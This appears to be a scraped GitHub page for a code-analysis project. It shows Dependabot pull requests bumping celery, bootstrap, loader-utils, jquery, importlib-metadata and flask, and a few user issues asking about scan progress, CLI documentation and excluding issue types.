      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
    dependencies python 
    opened by dependabot[bot] 1
  • Bump bootstrap from 4.6.1 to 5.2.3 in /quantifiedcode/frontend

    Bump bootstrap from 4.6.1 to 5.2.3 in /quantifiedcode/frontend

    Bumps bootstrap from 4.6.1 to 5.2.3.

    Release notes

    Sourced from bootstrap's releases.

    v5.2.3

    Fixes

    🎨 CSS

    • #37377: Import root in bootstrap-utilities
    • #37425: Fix deprecation warning with sass 1.56.0
    • Carousel: Fix RTL translate() direction

    ☕️ JavaScript

    • #37235: fix tooltip/popper disposal inconsistencies

    v5.2.2

    Highlights

    • Accordion
      • Use Sass variable for the accordion color instead of an invalid CSS variable
    • Buttons
      • Undo changes to .btn:hover from v5.2.1. We now explicitly target .btn-check styles instead.
    • Dropdowns
      • Temporarily restore ability for dropdowns to work without an explicit data attribute (will be removed again in v6)
    • Modals
      • Improve modal event listeners
      • Use <h1> for all .modal-title instances in our docs
    • Tables
      • Don't redefine $border-color in table-variant() mixin
    • Tabs
      • Tabs no longer autofocus and cause pages to jump on tab.show()
      • Fix .active class toggling of tabs within dropdowns
    • Toasts
      • Properly set toast z-index on .toast-container as opposed to individual .toasts that don't receive any other positioning
    • Tooltips
      • Fix tooltip selectors with title attribute on dynamically created elements

    🎨 CSS

    • #37118: Set toast z-index variable in the correct spot
    • #37165: Explicitly target .btn-check and undo :hover
    • #37182: Use Sass variable for accordion color
    • #37239: Don't redefine $border-color in table-variant mixin

    ☕️ JavaScript

    • #36914: Fix tooltip selector usage
    • #37128: Fix modal event listeners
    • #37146: Drop tabs auto-focus
    • #37151: Fix active class toggling of tabs within dropdown
    • #37189: Enrich Tab Test for keyboard handler
    • #37190: Dropdown: fix case with invalid markup

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump loader-utils from 1.4.0 to 1.4.2 in /quantifiedcode/frontend

    Bump loader-utils from 1.4.0 to 1.4.2 in /quantifiedcode/frontend

    Bumps loader-utils from 1.4.0 to 1.4.2.

    Release notes

    Sourced from loader-utils's releases.

    v1.4.2

    1.4.2 (2022-11-11)

    Bug Fixes

    v1.4.1

    1.4.1 (2022-11-07)

    Bug Fixes

    Changelog

    Sourced from loader-utils's changelog.

    1.4.2 (2022-11-11)

    Bug Fixes

    1.4.1 (2022-11-07)

    Bug Fixes

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump jquery from 3.6.1 to 3.6.3 in /quantifiedcode/frontend

    Bump jquery from 3.6.1 to 3.6.3 in /quantifiedcode/frontend

    Bumps jquery from 3.6.1 to 3.6.3.

    Release notes

    Sourced from jquery's releases.

    jQuery supports CSS.supports in jQuery 3.6.3

    https://blog.jquery.com/2022/12/20/jquery-3-6-3-released-a-quick-selector-fix/

    jQuery 3.6.2 :has arrived!

    https://blog.jquery.com/2022/12/13/jquery-3-6-2-released/

    Commits
    • 6786a17 3.6.3
    • 81d5bd1 Build: remove stale Insight package from custom builds
    • 8989500 Selector: Update Sizzle from 2.3.8 to 2.3.9
    • 2c5b47c Build: Updating the 3.x-stable version to 3.6.3-pre.
    • 2215119 Release: update authors
    • 0d9fae4 Build: Limit permissions for GitHub workflows
    • f4809f9 Build: Test on Node.js 18 & 19, stop testing on Node 12
    • 5318e31 Selector:Manipulation: Fix DOM manip within template contents
    • a1b7ae3 Selector: Update Sizzle from 2.3.7 to 2.3.8
    • 28241b7 Build: Bump actions/setup-node from 3.5.0 to 3.5.1
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 0
  • Bump importlib-metadata from 4.13.0 to 5.2.0

    Bump importlib-metadata from 4.13.0 to 5.2.0

    Bumps importlib-metadata from 4.13.0 to 5.2.0.

    Changelog

    Sourced from importlib-metadata's changelog.

    v5.2.0

    • #371: Deprecated expectation that PackageMetadata.__getitem__ will return None for missing keys. In the future, it will raise a KeyError.

    v5.1.0

    • #415: Instrument SimplePath with generic support.

    v5.0.0

    • #97, #284, #300: Removed compatibility shims for deprecated entry point interfaces.
    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 0
  • Bump flask from 2.0.3 to 2.2.2

    Bump flask from 2.0.3 to 2.2.2

    Bumps flask from 2.0.3 to 2.2.2.

    Release notes

    Sourced from flask's releases.

    2.2.2

    This is a fix release for the 2.2.0 feature release.

    2.2.1

    This is a fix release for the 2.2.0 feature release.

    2.2.0

    This is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as pip-tools to pin all dependencies and control upgrades.

    2.1.3

    2.1.2

    This is a fix release for the 2.1.0 feature release.

    2.1.1

    This is a fix release for the 2.1.0 feature release.

    2.1.0

    This is a feature release, which includes new features and removes previously deprecated features. The 2.1.x branch is now the supported bugfix branch, the 2.0.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as pip-tools to pin all dependencies and control upgrades.

    We also encourage upgrading to the latest versions of the other Pallets projects as well.

    Changelog

    Sourced from flask's changelog.

    Version 2.2.2

    Released 2022-08-08

    • Update Werkzeug dependency to >= 2.2.2. This includes fixes related to the new faster router, header parsing, and the development server. :pr:4754
    • Fix the default value for app.env to be "production". This attribute remains deprecated. :issue:4740

    Version 2.2.1

    Released 2022-08-03

    • Setting or accessing json_encoder or json_decoder raises a deprecation warning. :issue:4732

    Version 2.2.0

    Released 2022-08-01

    • Remove previously deprecated code. :pr:4667

      • Old names for some send_file parameters have been removed. download_name replaces attachment_filename, max_age replaces cache_timeout, and etag replaces add_etags. Additionally, path replaces filename in send_from_directory.
      • The RequestContext.g property returning AppContext.g is removed.
    • Update Werkzeug dependency to >= 2.2.

    • The app and request contexts are managed using Python context vars directly rather than Werkzeug's LocalStack. This should result in better performance and memory use. :pr:4682

      • Extension maintainers, be aware that _app_ctx_stack.top and _request_ctx_stack.top are deprecated. Store data on g instead using a unique prefix, like g._extension_name_attr.
    • The FLASK_ENV environment variable and app.env attribute are deprecated, removing the distinction between development and debug mode. Debug mode should be controlled directly using the --debug option or app.run(debug=True). :issue:4714

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 0
  • Ability to see percentage progress of scan

    Ability to see percentage progress of scan

    The web UI on http://localhost:5000 shows "Analysis in progress..." and a spinning symbol. Meanwhile the docker process started with start.sh is emitting hundreds of messages, although they seem to repeat a variation of themselves periodically. This is a relatively small project although it has node_modules dependencies included in the repository so this may make it seem like more. The PC running docker has plenty of RAM and cores. The point is, will it take 10 minutes, 10 hours or 10 days, I have no idea?

    opened by macsplit 2
  • CLI documentation for checkmate tool

    CLI documentation for checkmate tool

    I have no idea what commands are available for the checkmate tool, other than what I found in the sh scripts. Where are the commands and arguments documented? checkmate help returns:

    Unknown command: help

    opened by carlin-q-scott 3
  • Ability to configure issues at or after run time?

    Ability to configure issues at or after run time?

    I am testing this against a code base comprising >7k files (Java and JS mainly). The ensemble approach is great, but I have not been able to determine if it is possible to exclude issues from analysis and thereby speed up the overall analysis time.

    The UI seems to have this functionality, but 1) the filtering API/current database schema does not seem to support selection or exclusion of e.g., "readbility" issues en masse (see my PR for a bug in this feature btw), and 2) manually deselecting via the on/off switch does not appear to affect scans currently in progress.

    Any advise on how I can exclude issues from consideration for a scan, either before or after scan is started?

    opened by isclayton 1
Releases(v0.9.9-alpha)
Owner
Marcin Kozlowski
IT
Marcin Kozlowski
A GitHub app to report failed workflow job actions and notify pull request creator with custom report message for the failed workflow job.

Workflow Reporter A GitHub App built with Probot that reports failed workflow job actions and notify the pull request creator with custom report messa

Divyanshu Shekhar 14 Nov 12, 2022
Vite plugin to client bundle i18next locales composited from one to many json/yaml files from one to many libraries. Zero config HMR support included.

vite-plugin-i18next-loader yarn add -D vite-plugin-i18next-loader Vite plugin to client bundle i18next locales composited from one to many json/yaml f

AlienFast 4 Nov 30, 2022
A Cli that handles the creation of a basic express App that supports Husky configuration & static analysis tools

@phazero/create-express-app · Create express app is a CLI that can generate boiler plate code for setting up an express app. Installation & Usage npx

PhazeRo 13 Oct 29, 2022
ec0lint - a static code analysis tool

ec0lint is a static code analysis tool that provides the users with useful hints on how to reduce the digital footprint of their webpages during the development process. Applying code changes suggested by ec0lint will make result with webpages that emit less carbon per visit, load quicker and are more space- efficient. The tool is open-source and community-driven.

ec0lint 127 Dec 5, 2022
Code examples for my TypeScript Static Analysis Hidden Gems talk. 💎

TypeScript Static Analysis Hidden Gems Code Code samples for the talk, formed from my template-typescript-node-package. ✨ ?? Slides available here! ??

Josh Goldberg 4 Nov 2, 2022
A community website built by the community for the community (Hacktoberfest 2022) :tada:

Hacktoberfest 2022 ?? : Built by the community for the community! This repository is an initiative which aims to help beginners kickstart their open-s

Your First Open Source Project 5 Oct 12, 2022
A community contributed game system for Pathfinder Second Edition.

The Official Pathfinder Second Edition Game System for FoundryVTT This system uses trademarks and/or copyrights owned by Paizo Inc., which are used wi

Foundry Virtual Tabletop 104 Jan 5, 2023
The SheetJS Community Edition offers battle-tested open-source solution

The SheetJS Community Edition offers battle-tested open-source solutions for extracting useful data from almost any complex spreadsheet and generating new spreadsheets that will work with legacy and modern software alike.

SheetJS 32k Dec 29, 2022
Webpack dev tools to make performance analysis, error investigation and loader development more convenient

build-tool-inspector Introduction Webpack dev tools to make performance analysis, error investigation and loader development more convenient. Provide

Modern JS 25 Nov 17, 2022
Visual Studio Code extension for formatting and linting Django/Jinja HTML templates using djLint

Visual Studio Code extension for formatting and linting Django/Jinja HTML templates using djLint

Almaz 25 Dec 15, 2022
Allows the public to easily report and track the geolocation of anyone or anything they spot outside, using a mobile app or web frontend.

LIVE DEMO: https://armytracker.com/ (tracking the invading Russian army in Ukraine) Attention: - If you'd like to help the project either as a program

Michal Certicky 9 Mar 27, 2022
Gofiber with NextJS Static HTML is a small Go program to showcase for bundling a static HTML export of a Next.js app

Gofiber and NextJS Static HTML Gofiber with NextJS Static HTML is a small Go program to showcase for bundling a static HTML export of a Next.js app. R

Mai 1 Jan 22, 2022
Use thirdweb's token, edition drop, and a custom contract using thirdweb deploy to build a Play-to-Earn game!

thirdweb Play-to-Earn Example This example project is a simple Play-to-Earn (P2E) game! The Idea The game is a "mining" game, where your character min

thirdweb templates 28 Jan 2, 2023
This repository contains a basic example on how to set up and run test automation jobs with CircleCI and report results to Testmo.

CircleCI test automation example This repository contains a basic example on how to set up and run test automation jobs with CircleCI and report resul

Testmo 2 Dec 23, 2021
GitHub Action that posts the report in a comment on a GitHub Pull Request from coverage data generated by nyc (istanbul)

GitHub Action: Report NYC coverage GitHub Action that posts the report in a comment on a GitHub Pull Request from coverage data generated by nyc (ista

Sid 16 Nov 23, 2022
The project integrates workflow engine, report engine and organization authority management background, which can be applied to the development of OA, HR, CRM, PM and other systems. With tlv8 IDE, business system development, testing and deployment can be realized quickly.

介绍 项目集成了工作流引擎、报表引擎和组织机构权限管理后台,可以应用于OA、HR、CRM、PM等系统开发。配合使用tlv8 ide可以快速实现业务系统开发、测试、部署。 后台采用Spring MVC架构简单方便,前端使用流行的layui界面美观大方。 采用组件开发技术,提高系统的灵活性和可扩展性;采

Qian Chen 38 Dec 27, 2022
Simple time-aware report bot for Telegram.

report bot Built using grammY. Simple time-aware report bot for Telegram. It listens for /report, /admin commands or @admin, @admins mentions in group

Dunkan 11 Oct 2, 2022
Download all Moodle files with one click. This is a Chrome extension built to save time and effort from downloading files manually one by one!

Moodle Downloader Extension Moodle downloader extension for Chrome. The extension is tested with both the TUM moodle and the official moodle demo. Not

Zhongpin Wang 8 Nov 15, 2022
Hasbik is a community based social token and the new paradigm in the crypto space. With the goal to build a community around a crypto token.

Hasbik is a community based social token and the new paradigm in the crypto space. With the goal to build a community around a crypto token.

null 2 Jan 5, 2022